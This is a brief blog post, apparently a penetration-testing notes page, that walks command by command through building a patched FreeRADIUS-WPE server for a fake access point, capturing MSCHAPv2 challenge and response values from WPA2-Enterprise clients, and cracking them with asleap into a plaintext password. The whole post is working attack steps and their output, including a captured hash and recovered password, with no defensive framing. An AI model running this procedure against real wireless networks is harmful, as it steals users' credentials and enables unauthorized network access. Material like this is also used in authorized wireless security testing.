hacktracking: # Cracking WPA2 enterprise wireless networks with Freeradius WPE and a fake AP

# Cracking WPA2 enterprise wireless networks with Freeradius WPE and a fake AP

# wget ftp://ftp.freeradius.org/pub/radius/old/freeradius-server-2.1.12.tar.bz2
# wget --no-check-certificate https://raw.github.com/brad-anton/freeradius-wpe/master/freeradius-wpe.patch
# tar xvjf freeradius-server-2.1.12.tar.bz2
# cd freeradius-server-2.1.12
# patch -p1 < ../freeradius-wpe.patch
# ./configure
# make
# make install
# ldconfig
# cd /usr/local/etc/raddb/certs/
# ./bootstrap
# /usr/local/sbin/radiusd -v
radiusd: FreeRADIUS-WPE Version 2.1.12
# grep with_ntdomain_hack /usr/local/etc/raddb/modules/mschap
with_ntdomain_hack = yes
# radiusd -X

# cat /usr/local/var/log/radius/freeradius-server-wpe.log
mschap: Sun Jan 31 22:00:00 2016

 username: aaaaaaa
 challenge: 6e:61:f4:26:7a:c5:96:12
 response: 0c:b6:46:9e:0f:70:fb:e7:ba:6b:0d:72:7a:71:63:fa:c2:e3:5b:c5:eb:04:6c:b5
 john NETNTLM: aaaaaaa:$NETNTLM$6e61f4267ac59612$0cb6469e0f70fbe7ba6b0d727a7163fac2e35bc5eb046cb5

# asleap -C 6e:61:f4:26:7a:c5:96:12 -R 0c:b6:46:9e:0f:70:fb:e7:ba:6b:0d:72:7a:71:63:fa:c2:e3:5b:c5:eb:04:6c:b5 -W dictionary.txt

 hash bytes: 5b0a
 NT hash: 2aff86e7f6e8bd54841a7981c0a55b0a
 password: bbbbbbbb

Reference

https://github.com/brad-anton/freeradius-wpe

# Cracking WPA2 enterprise wireless networks with Freeradius WPE and a fake AP

No comments: